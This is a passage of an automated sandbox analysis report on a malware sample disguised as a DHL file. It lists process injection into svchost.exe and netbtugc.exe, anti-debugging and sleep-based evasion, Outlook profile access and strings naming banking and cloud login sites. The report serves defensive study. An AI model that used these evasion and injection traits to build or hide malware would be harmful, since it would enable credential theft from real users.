            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: DHL 806-232024.exeStatic file information: File size 1208832 > 1048576
            Source: DHL 806-232024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DHL 806-232024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DHL 806-232024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DHL 806-232024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DHL 806-232024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DHL 806-232024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DHL 806-232024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yAEEhNGBaPExAdMu.exe, 00000003.00000002.4529766745.00000000004DE000.00000002.00000001.01000000.00000004.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4529866987.00000000004DE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 806-232024.exe, 00000000.00000003.2062085946.0000000003930000.00000004.00001000.00020000.00000000.sdmp, DHL 806-232024.exe, 00000000.00000003.2060906795.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115983541.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2117729754.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.000000000383E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2216468139.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2214245032.000000000334A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 806-232024.exe, 00000000.00000003.2062085946.0000000003930000.00000004.00001000.00020000.00000000.sdmp, DHL 806-232024.exe, 00000000.00000003.2060906795.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2214449127.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115983541.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2117729754.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4530635872.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.000000000383E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2216468139.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2214245032.000000000334A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2181119157.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214208965.0000000002800000.00000004.00000020.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530115940.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4529839998.000000000320E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530981261.0000000003CCC000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2505119370.000000002961C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4529839998.000000000320E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530981261.0000000003CCC000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2505119370.000000002961C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2181119157.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214208965.0000000002800000.00000004.00000020.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530115940.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: DHL 806-232024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DHL 806-232024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DHL 806-232024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DHL 806-232024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DHL 806-232024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0094C304 LoadLibraryA,GetProcAddress,0_2_0094C304
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008F8B85 push ecx; ret 0_2_008F8B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003248A9 push esp; ret 2_2_003248AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0033E2BA push 00000038h; iretd 2_2_0033E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0033A436 push ebx; iretd 2_2_0033A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00338C92 pushad ; retf 2_2_00338C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0033A5D9 push ebx; iretd 2_2_0033A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003347A2 push es; iretd 2_2_003347AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00323780 push eax; ret 2_2_00323782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003217E5 push ebp; retf 003Fh2_2_003217E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx2_2_02F309B6
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031D36A8 pushfd ; retf 3_2_031D36D2
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031B3AED push esp; ret 3_2_031B3AEE
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031C981D push ebx; iretd 3_2_031C9844
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031D28BC push FFFFFFBAh; ret 3_2_031D28BE
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031C967A push ebx; iretd 3_2_031C9844
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031C7ED6 pushad ; retf 3_2_031C7ED7
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031CD4FE push 00000038h; iretd 3_2_031CD502
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036D09AD push ecx; mov dword ptr [esp], ecx4_2_036D09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DC2238 pushad ; iretd 4_2_02DC2239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DC101F push es; iretd 4_2_02DC1027
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DCD1B0 push es; ret 4_2_02DCD1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DB1126 push esp; ret 4_2_02DB1127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DC550F pushad ; retf 4_2_02DC5510
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DCAB37 push 00000038h; iretd 4_2_02DCAB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DCFEF5 push FFFFFFBAh; ret 4_2_02DCFEF7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DC0EAB push ebp; retf 4_2_02DC0EAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DC6E56 push ebx; iretd 4_2_02DC6E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBFFA0 push esi; iretd 4_2_02DBFFA5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DC6CB3 push ebx; iretd 4_2_02DC6E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035803DA push ebx; ret 4_2_0358042C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03584268 push cs; retf 4_2_035842F6
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008D4A35
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009555FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009555FD
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008F33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008F33C7
            Source: C:\Users\user\Desktop\DHL 806-232024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\DHL 806-232024.exeAPI/Special instruction interceptor: Address: E5021C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9843Jump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeAPI coverage: 4.3 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1084Thread sleep count: 130 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1084Thread sleep time: -260000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1084Thread sleep count: 9843 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1084Thread sleep time: -19686000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe TID: 7064Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe TID: 7064Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe TID: 7064Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00934696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00934696
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0093C9C7
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093C93C FindFirstFileW,FindClose,0_2_0093C93C
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0093F200
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0093F35D
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093F65E
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00933A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00933A2B
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00933D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00933D4E
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093BF27
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DCBAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_02DCBAB0
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008D4AFE
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: firefox.exe, 00000007.00000002.2506501902.0000025B694CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: netbtugc.exe, 00000004.00000002.4529839998.000000000320E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530170812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00337823 LdrLoadDll,2_2_00337823
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009441FD BlockInput,0_2_009441FD
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008D3B4C
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00905CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00905CCC
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0094C304 LoadLibraryA,GetProcAddress,0_2_0094C304
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00E504E8 mov eax, dword ptr fs:[00000030h]0_2_00E504E8
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00E50488 mov eax, dword ptr fs:[00000030h]0_2_00E50488
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00E4EE48 mov eax, dword ptr fs:[00000030h]0_2_00E4EE48
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]2_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]2_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
